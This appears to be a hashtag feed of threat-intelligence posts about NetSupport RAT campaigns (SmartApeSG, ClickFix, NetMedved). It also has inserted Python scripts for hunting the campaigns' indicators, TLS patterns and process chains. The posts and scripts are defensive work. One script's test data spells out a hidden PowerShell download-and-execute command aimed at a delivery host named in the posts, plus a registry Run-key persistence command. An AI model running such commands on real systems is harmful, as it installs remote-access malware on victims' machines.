#NetSupport

2025-12-10

JS SMUGGLER Multi Stage Hidden iframes Obfuscated JavaScript Silent Redirectors NetSupport RAT Delivery

Pulse ID: 6939016e326fd6a1b64a4ad6
Pulse Link: otx.alienvault.com/pulse/69390
Pulse Author: Tr1sa111
Created: 2025-12-10 05:13:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Java #JavaScript #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #Tr1sa111

2025-12-09

Campaign uses ClickFix page to push NetSupport RAT

The SmartApeSG campaign, also known as ZPHP or HANEYMANEY, has evolved from using fake browser update pages to employing ClickFix-style fake CAPTCHA pages. This campaign distributes malicious NetSupport RAT packages as its initial infection vector. The attack chain begins with an injected script on compromised websites, which, under certain conditions, displays a fake CAPTCHA page. When users interact with this page, malicious content is injected into the Windows clipboard, prompting users to paste and execute it. This leads to the download and installation of NetSupport RAT, which maintains persistence through a Start Menu shortcut. The campaign frequently changes domains, packages, and C2 servers to evade detection.

Pulse ID: 69370db0cd2bc81cbbe13d51
Pulse Link: otx.alienvault.com/pulse/69370
Pulse Author: AlienVault
Created: 2025-12-08 17:41:04

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CAPTCHA #Clipboard #CyberSecurity #FakeBrowser #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PHP #RAT #SmartApeSg #Windows #bot #AlienVault

2025-12-08

JS#SMUGGLER Deploying NetSupport RAT via Compromised Websites

JS#SMUGGLER is a web-based malware campaign that uses compromised websites to deliver the NetSupport RAT

Pulse ID: 6937559768d29b8bfdeb42c9
Pulse Link: otx.alienvault.com/pulse/69375
Pulse Author: cryptocti
Created: 2025-12-08 22:47:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #cryptocti

2025-12-08

SmartApeSG campaign uses ClickFix page to push NetSupport RAT

Pulse ID: 6936a7709dd0d1b331e8ad64
Pulse Link: otx.alienvault.com/pulse/6936a
Pulse Author: CyberHunter_NL
Created: 2025-12-08 10:24:48

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #SmartApeSg #bot #CyberHunter_NL

2025-12-03

Technical Analysis of Matanbuchus 3.0

Matanbuchus, a C++ malicious downloader offered as Malware-as-a-Service since 2020, has evolved to version 3.0. It comprises a downloader and main module, utilizing obfuscation techniques like junk code, encrypted strings, and API hashing. The malware implements anti-analysis features, including an expiration date and persistence via scheduled tasks. It communicates using encrypted Protobufs over HTTP(S), supporting various commands for payload execution, data collection, and system manipulation. Matanbuchus has been associated with ransomware operations and used to distribute other malware like Rhadamanthys and NetSupport RAT.

Pulse ID: 692ff91584de642b1a8cbd3b
Pulse Link: otx.alienvault.com/pulse/692ff
Pulse Author: AlienVault
Created: 2025-12-03 08:47:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #HTTP #InfoSec #Malware #MalwareAsAService #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RansomWare #Rhadamanthys #bot #AlienVault

2025-11-28

EVALUSION Campaign Delivers Amatera Stealer and NetSupport…

Pulse ID: 6929307677258c017cf87bf6
Pulse Link: otx.alienvault.com/pulse/69293
Pulse Author: Tr1sa111
Created: 2025-11-28 05:17:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #OTX #OpenThreatExchange #bot #Tr1sa111

2025-11-26

The 'Bear' attacks: what we learned about the phishing campaign targeting Russian organizations

A hacking group named NetMedved has been conducting phishing attacks against Russian organizations since October 2025. The campaign uses malicious LNK files disguised as business documents to deliver NetSupport RAT malware. The attackers employ various techniques including PowerShell scripts, finger protocol, and anti-analysis checks. They utilize multiple domains for payload delivery and command and control. The group's infrastructure overlaps with previous campaigns from 2024, suggesting an evolution of tactics rather than a new actor. NetMedved's operations involve social engineering, custom obfuscation, and abuse of legitimate tools to evade detection and maintain persistence on compromised systems.

Pulse ID: 6926cae8043aabe58197d11e
Pulse Link: otx.alienvault.com/pulse/6926c
Pulse Author: AlienVault
Created: 2025-11-26 09:39:52

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #ICS #InfoSec #LNK #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #Russia #SocialEngineering #bot #AlienVault

2025-11-21

'Medved' attacks: what we learned about the phishing campaign of a group targeting Russian organizations

In October 2025 we, the cyber threat intelligence team of the Threat Intelligence department, recorded ongoing phishing activity by a hacker group we named NetMedved. The reasoning behind this name is covered in the final part of the article. The attacks target Russian organizations; the final payload is a malicious build of the legitimate remote administration tool NetSupport Manager (hereafter NetSupportRAT). In this article we describe the specifics of the campaign and its links to our previous findings.

habr.com/ru/companies/pt/artic

#киберразведка #расследование_инцидентов #кибератаки #хакерская_группировка #хакерские_инструменты #фишинговые_письма #вредоносное_программное_обеспечение #малварь #finger #netsupport

2025-11-19

EVALUSION Campaign Delivers Amatera Stealer and NetSupport...

The eSentire Threat Response Unit identified a malware campaign using ClickFix as an initial access vector to deploy Amatera Stealer and NetSupport RAT. Amatera Stealer is a rebranded version of ACR Stealer, with advanced evasion techniques like WoW64 SysCalls to bypass security solutions. It targets crypto-wallets, browsers, and messaging apps. The attack chain involves social engineering, PowerShell stages, and a .NET-based downloader. Amatera communicates with its C2 server using encrypted channels and can deploy additional payloads. The campaign selectively targets systems with valuable data or domain membership before deploying NetSupport RAT. Recommendations include disabling mshta.exe, restricting the Run prompt, implementing phishing awareness training, and using Next-Gen AV or EDR solutions.

Pulse ID: 691cf085ce463d915d5c5dc8
Pulse Link: otx.alienvault.com/pulse/691cf
Pulse Author: AlienVault
Created: 2025-11-18 22:17:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #EDR #InfoSec #LUA #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SocialEngineering #ThreatResponseUnit #bot #eSentire #AlienVault

Offensive Sequence (offseq@infosec.exchange)
2025-08-31

⚠️ CVE-2025-34164: HIGH-severity heap overflow in NetSupport Manager 14.x (<14.12.0000) lets remote attackers cause DoS or run code—no auth needed. Restrict access & prep to patch! radar.offseq.com/threat/cve-20 #OffSeq #NetSupport #Vulnerability #Cybersecurity

High threat: CVE-2025-34164: CWE-122 Heap-based Buffer Overflow in NetSupport Ltd. NetSupport Manager

Offensive Sequence (offseq@infosec.exchange)
2025-08-31

⚠️ CVE-2025-34165: NetSupport Manager 14.x (pre-14.12.0000) HIGH severity stack-based buffer overflow allows remote, unauthenticated DoS or memory leak. Restrict access, monitor for attacks, prep for patching. radar.offseq.com/threat/cve-20 #OffSeq #NetSupport #Vuln #BlueTeam

High threat: CVE-2025-34165: CWE-121 Stack-based Buffer Overflow in NetSupport Ltd. NetSupport Manager

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Redirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at github.com/malware-traffic/ind

cc: @monitorsg

[Images: fake CAPTCHA page from the first example; fake SmartApeSG injected script from the first example; fake CAPTCHA page from the second example; fake SmartApeSG injected script from the second example.]
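A quick way to put the defanged indicators above to work, as an added example that is not part of the post: refang them, normalise host and path, and match them against proxy logs so the compromised site --> redirector --> CAPTCHA-script chain shows up per client. The IOC strings are the ones quoted in the post; the proxy log lines and their layout (timestamp, client, method, URL, status, referer) are constructed for illustration and are not real traffic.

```python
"""Refang the defanged IOCs quoted in the SmartApeSG post and match them
against proxy log lines, reconstructing the per-client redirect chain.
Added example: the IOC strings are the ones in the post above; the proxy
log lines are constructed for illustration and are not real traffic."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators exactly as defanged in the post (hxxps, [:], [.]).
DEFANGED_IOCS = [
    "hxxps[:]//mexicobusiness[.]news/",
    "hxxps[:]//clouwave[.]net/ajax/pixi.min.js",
    "hxxps[:]//myvocabulary[.]com/",
    "hxxps[:]//myevmanual[.]com/d.js",
]

# Constructed proxy log: timestamp, client, method, URL, status, referer.
PROXY_LOG = """\
1755856000.101 10.0.0.5 GET https://myvocabulary.com/ 200 -
1755856000.412 10.0.0.5 GET https://myevmanual.com/d.js 302 https://myvocabulary.com/
1755856000.690 10.0.0.5 GET https://clouwave.net/ajax/pixi.min.js?v=3 200 https://myvocabulary.com/
1755856001.002 10.0.0.5 GET https://www.example.com/ 200 -
1755856030.333 10.0.0.9 GET https://www.example.org/ajax/pixi.min.js 200 https://www.example.org/
"""


def refang(ioc: str) -> str:
    """Undo the usual defanging so the IOC can be compared with live URLs:
    hxxp(s) -> http(s), [:] -> :, [.] or (.) -> ."""
    ioc = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.IGNORECASE)
    return ioc.replace("[:]", ":").replace("[.]", ".").replace("(.)", ".")


def ioc_key(url: str) -> tuple[str, str]:
    """Normalise a URL to (host, path): scheme, port and query string are
    ignored so a cache-busting parameter such as ?v=3 cannot hide a hit."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return (parts.hostname or "").lower(), parts.path or "/"


def match_proxy_log(log_text: str, defanged_iocs: list[str]) -> list[dict]:
    """One hit per log line whose URL matches an IOC exactly (host and path)
    or whose host is an IOC host; a matching path on another host is not a hit."""
    keys = {ioc_key(refang(i)) for i in defanged_iocs}
    hosts = {host for host, _ in keys}
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, referer = line.split()
        host, path = ioc_key(url)
        if (host, path) in keys:
            reason = "exact IOC URL"
        elif host in hosts:
            reason = "IOC domain"
        else:
            continue
        hits.append({"ts": float(ts), "client": client, "method": method,
                     "url": url, "status": int(status), "referer": referer,
                     "reason": reason})
    return hits


def chains_by_client(hits: list[dict]) -> dict[str, list[str]]:
    """Order the hits per client so the compromised-site -> redirector ->
    CAPTCHA-script sequence described in the post is visible as one chain."""
    chains = defaultdict(list)
    for h in sorted(hits, key=lambda h: h["ts"]):
        chains[h["client"]].append(ioc_key(h["url"])[0])
    return dict(chains)


if __name__ == "__main__":
    hits = match_proxy_log(PROXY_LOG, DEFANGED_IOCS)
    for h in hits:
        print(f'{h["client"]} {h["status"]} {h["url"]}  <- {h["referer"]}  [{h["reason"]}]')
    print(chains_by_client(hits))
```

The exact-URL match is keyed on host and path only, so the `?v=3` cache-buster on `pixi.min.js` still hits, while the same path on an unrelated host (the `www.example.org` line) is deliberately left alone; the 302 on `d.js` is what the post describes for the redirector stage.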

2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.

Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html

[Images: fake CAPTCHA page generated by the SmartApeSG script injected into a compromised website; ClickFix instructions from the fake CAPTCHA page; traffic from the infection filtered in Wireshark; script and traffic to download and run the MSI file that installs NetSupport RAT.]

🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix
⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging.
👾 While earlier ClickFix campaigns mainly deployed #NetSupport RAT or #AsyncRAT, this C++ infostealer ranks in the upper tier for advanced evasion techniques and extensive data theft capabilities.

#ANYRUN Sandbox lets SOC teams observe and execute complex chains, revealing evasive behavior and providing intelligence that can be directly applied to detection rules, playbooks, and proactive hunting.

🔗 Execution Chain:
ClickFix ➡️ msiexec ➡️ exe-file ➡️ infected system file ➡️ PNG-stego payload

In a recent campaign, the phishing domain initiates a ClickFix flow (#MITRE T1566), prompting the user to execute a malicious MSI payload hosted on a remote server.

🥷 The installer is silently executed in memory (#MITRE T1218.007), deploying a stealer component into a disguised software directory under the user profile.

The dropped binary performs anti-VM checks (T1497.001) to avoid analysis.

In later stages, a compromised system file is used to initiate a TLS connection directly to an IP address, bypassing DNS monitoring.

📌 For encryption, attackers use self-signed TLS certificates with mismatched fields (e.g., Issuer or Subject), creating distinctive indicators for threat hunting and expanding an organization’s visibility into its threat landscape.

🖼️ The C2 delivers an obfuscated PNG containing additional payloads via steganography (T1027.003), extending dwell time and complicating detection.

🎯 See execution on a live system and download actionable report: app.any.run/tasks/a101654d-70f

🔍 Use these #ANYRUN TI Lookup search queries to track similar campaigns and enrich #IOCs with live attack data from threat investigations across 15K SOCs:
intelligence.any.run/analysis/
intelligence.any.run/analysis/
intelligence.any.run/analysis/
intelligence.any.run/analysis/

👾 IOCs:
84.200[.]80.8
179.43[.]141.35
194.87[.]29.253
flaxergaurds[.]com
temopix[.]com
zerontwoposh[.]live
loanauto[.]cloud
wetotal[.]net
Find more indicators in the comments 💬

Protect critical assets with faster, deeper visibility into complex threats using #ANYRUN 🚀

#cybersecurity #infosec
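The TLS indicator in the post (a connection straight to an IP with no DNS lookup, protected by an untrusted certificate whose Issuer and Subject do not line up) is something you can hunt for in Zeek-style `ssl.log` data. The script below is an added example, not code from ANY.RUN or the post: it assumes a reduced Zeek-like field set (`server_name`, `subject`, `issuer`, `validation_status`) and uses constructed records with documentation-range addresses, not the IOCs above. It treats "no SNI" as the required signal and certificate anomalies as confidence boosters, which is one reading of the post's "mismatched fields".

```python
"""Hunt Zeek-style ssl.log records for the TLS pattern in the post: a
connection straight to an IP address (no SNI) whose certificate is not
trusted and whose Issuer/Subject do not line up.  Added example, not from
ANY.RUN or the post; the log below is constructed with a reduced field set
and documentation-range addresses, not real traffic or the post's IOCs."""

# Constructed, Zeek-like TSV: "#fields" header then one record per line;
# "-" is Zeek's marker for an unset field.
SSL_LOG = """\
#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\tserver_name\tsubject\tissuer\tvalidation_status
1755856100.1\t10.0.0.5\t203.0.113.10\t443\t-\tCN=localhost\tCN=Root CA,O=Nobody\tunable to get local issuer certificate
1755856100.2\t10.0.0.5\t198.51.100.20\t443\twww.example.com\tCN=www.example.com\tCN=Example Public CA,O=Example\tok
1755856100.3\t10.0.0.7\t203.0.113.55\t443\t-\tCN=update.local\tCN=update.local\tself signed certificate
1755856100.4\t10.0.0.7\t198.51.100.40\t443\tcdn.corp.example\tCN=cdn.corp.example\tCN=Corp Internal CA\tunable to get local issuer certificate
"""


def parse_zeek_tsv(text):
    """Yield one dict per record, keyed by the names in the #fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split("\t")))


def cn(dn):
    """Pull the CN attribute out of a distinguished name like 'CN=x,O=y'."""
    for part in dn.split(","):
        k, _, v = part.strip().partition("=")
        if k.upper() == "CN":
            return v
    return ""


def score(rec):
    """Return the reasons this record looks like the post's C2 pattern.
    No SNI is required: a direct-to-IP TLS session is the primary signal;
    certificate anomalies only raise confidence."""
    reasons = []
    if rec["server_name"] != "-":
        return reasons
    reasons.append("no SNI: TLS straight to IP, no DNS lookup to monitor")
    if rec["validation_status"] != "ok":
        reasons.append(f"untrusted chain: {rec['validation_status']}")
        if "self signed" in rec["validation_status"]:
            reasons.append("self-signed leaf certificate")
        elif cn(rec["subject"]) != cn(rec["issuer"]):
            reasons.append("issuer CN does not match subject CN and no trusted issuer found")
    return reasons


def hunt(text, min_reasons=2):
    """Records with at least min_reasons signals, as (resp_h, reasons)."""
    out = []
    for rec in parse_zeek_tsv(text):
        reasons = score(rec)
        if len(reasons) >= min_reasons:
            out.append((rec["id.resp_h"], reasons))
    return out


if __name__ == "__main__":
    for host, reasons in hunt(SSL_LOG):
        print(host, "->", "; ".join(reasons))
```

The record with a proper SNI but an internal-CA certificate (`cdn.corp.example`) is not reported, which is the tuning choice that keeps this hunt from drowning in internal PKI noise; drop the no-SNI requirement if your environment does not use SNI internally and accept the extra review load.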

🚨 #NetSupport RAT is a legit remote access app turned cyber weapon. Its activity spiked in 2025 with data theft attacks targeting healthcare, government, and SMBs in NA and EU.

👨‍💻 Read report and see analysis of a fresh sample: any.run/malware-trends/netsupp

#cybersecurity #infosec

2025-07-15 (Tuesday): Tracking #SmartApeSG

The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing your way through this leads to a #NetSupportRAT infection.

Compromised site (same as yesterday):

- medthermography[.]com

URLs for ClickFix style fake verification page:

- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9

Running the script for NetSupport RAT:

- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773

#NetSupport RAT server (same as yesterday):

- 185.163.45[.]87:443

[Images: traffic from an infection filtered in Wireshark; HTTPS URLs shown in Fiddler.]

2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing your way through this leads to a #NetSupportRAT infection.

Compromised site:

- medthermography[.]com

URLs for ClickFix style fake verification page:

- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971

Running the script for NetSupport RAT:

- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526

#NetSupport RAT server:

- 185.163.45[.]87:443

[Images: screenshot of the ClickFix-style fake verification page with the text of the script injected into the viewer's hijacked clipboard; traffic from an infection filtered in Wireshark (two views); NetSupport RAT persistent on an infected Windows host through a Windows registry update.]

🚨 #Obfuscated BAT file used to deliver NetSupport RAT

At the time of the analysis, the sample had not yet been submitted to #VirusTotal ⚠️

👨‍💻 See sandbox session: app.any.run/tasks/db6fcb53-6f1

🔗 Execution chain:
cmd.exe (BAT) ➡️ #PowerShell ➡️ PowerShell ➡️ #client32.exe (NetSupport client) ➡️ reg.exe

Key details:
🔹 Uses a 'client32' process to run #NetSupport #RAT and add it to autorun in registry via reg.exe
🔹 Creates an 'Options' folder in %APPDATA% if missing
🔹 NetSupport client downloads a task .zip file, extracts, and runs it from %APPDATA%\Application .zip
🔹 Deletes ZIP files after execution

❗️ BAT droppers remain a common choice in attacks as threat actors continue to find new methods to evade detection.

Use #ANYRUN’s Interactive Sandbox to quickly trace the full execution chain and uncover #malware behavior for fast and informed response.

#cybersecurity #infosec
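The execution chain in this post (cmd.exe/BAT -> PowerShell -> PowerShell -> client32.exe -> reg.exe) and the ClickFix chain in the SmartApeSG posts above (clipboard paste -> hidden PowerShell download -> client32.exe under the user profile -> Run-key persistence) both come down to the same three process-creation signals. The script below is an added example, not from ANY.RUN or the posts: it runs three rules over constructed Sysmon-style Event ID 1 records (pid, parent pid, image path, command line) and prints the ancestry of each hit. The user profile path, pids and command lines are hypothetical; the download host and file names (`lal.ps1`, `lotu.zip`, `client32.exe`) mirror the malware-traffic posts.

```python
"""Hunt for the ClickFix -> PowerShell -> client32.exe -> reg.exe chain in
process-creation telemetry.  Added example, not from the posts or from
ANY.RUN: the events below are constructed Sysmon-style Event ID 1 records
(pid, parent pid, image path, command line), not data from a real host."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


U = r"C:\Users\alice\AppData\Roaming"  # hypothetical user profile path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events; host and file names mirror the malware-traffic posts.
EVENTS = [
    ProcEvent(4001, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    # pasted into Win+R after the fake CAPTCHA hijacked the clipboard
    ProcEvent(4120, 4001, PS, 'powershell -w hidden -c "iwr https://sos-atlanta.com/lal.ps1 | iex"'),
    ProcEvent(4133, 4120, PS, f"powershell -ep bypass -f {U}\\lal.ps1"),
    ProcEvent(4210, 4133, f"{U}\\lotu\\client32.exe", "client32.exe"),
    ProcEvent(4222, 4210, r"C:\Windows\System32\reg.exe",
              f'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v lotu /t REG_SZ /d "{U}\\lotu\\client32.exe" /f'),
    # benign look-alikes the rules must not flag
    ProcEvent(5001, 4001, PS, r"powershell -File C:\Scripts\backup.ps1"),
    ProcEvent(5100, 900, r"C:\Program Files\NetSupport\NetSupport Manager\client32.exe", "client32.exe"),
]

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
DOWNLOAD = re.compile(r"https?://|\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|\biex\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-ep\s+bypass|-nop\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
PROGRAM_FILES = re.compile(r"^[a-z]:\\program files( \(x86\))?\\", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_clickfix_launch(e, by_pid):
    """Shell spawned directly by explorer.exe with a hidden, downloading
    command line: what a pasted ClickFix one-liner looks like."""
    parent = by_pid.get(e.ppid)
    return bool(parent and basename(parent.image) == "explorer.exe"
                and basename(e.image) in LOLBINS
                and DOWNLOAD.search(e.cmdline) and HIDDEN.search(e.cmdline))


def rule_netsupport_user_path(e, by_pid):
    """NetSupport client32.exe running outside Program Files, e.g. unpacked
    from a zip under %APPDATA% as in the posts."""
    return basename(e.image) == "client32.exe" and not PROGRAM_FILES.search(e.image)


def rule_run_key_persistence(e, by_pid):
    """reg.exe writing a Run value whose payload is client32.exe."""
    return bool(basename(e.image) == "reg.exe" and RUN_KEY.search(e.cmdline)
                and "client32.exe" in e.cmdline.lower())


RULES = [rule_clickfix_launch, rule_netsupport_user_path, rule_run_key_persistence]


def ancestry(pid, by_pid, limit=16):
    """Image basenames from the process up to the root of its known tree."""
    chain = []
    while pid in by_pid and len(chain) < limit:
        e = by_pid[pid]
        chain.append(basename(e.image))
        pid = e.ppid
    return chain


def hunt(events):
    """Apply every rule to every event; return (pid, rule name, ancestry)."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        for rule in RULES:
            if rule(e, by_pid):
                findings.append((e.pid, rule.__name__, ancestry(e.pid, by_pid)))
    return findings


if __name__ == "__main__":
    for pid, rule, chain in hunt(EVENTS):
        print(pid, rule, " <- ".join(chain))
```

The legitimate NetSupport install under Program Files and the scheduled backup script are there to show the rules keying on location and parentage rather than on the binary name alone; in a real environment add the Start Menu shortcut and `%APPDATA%\*.zip` writes from the posts as further signals, and whitelist your own NetSupport deployment paths explicitly.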
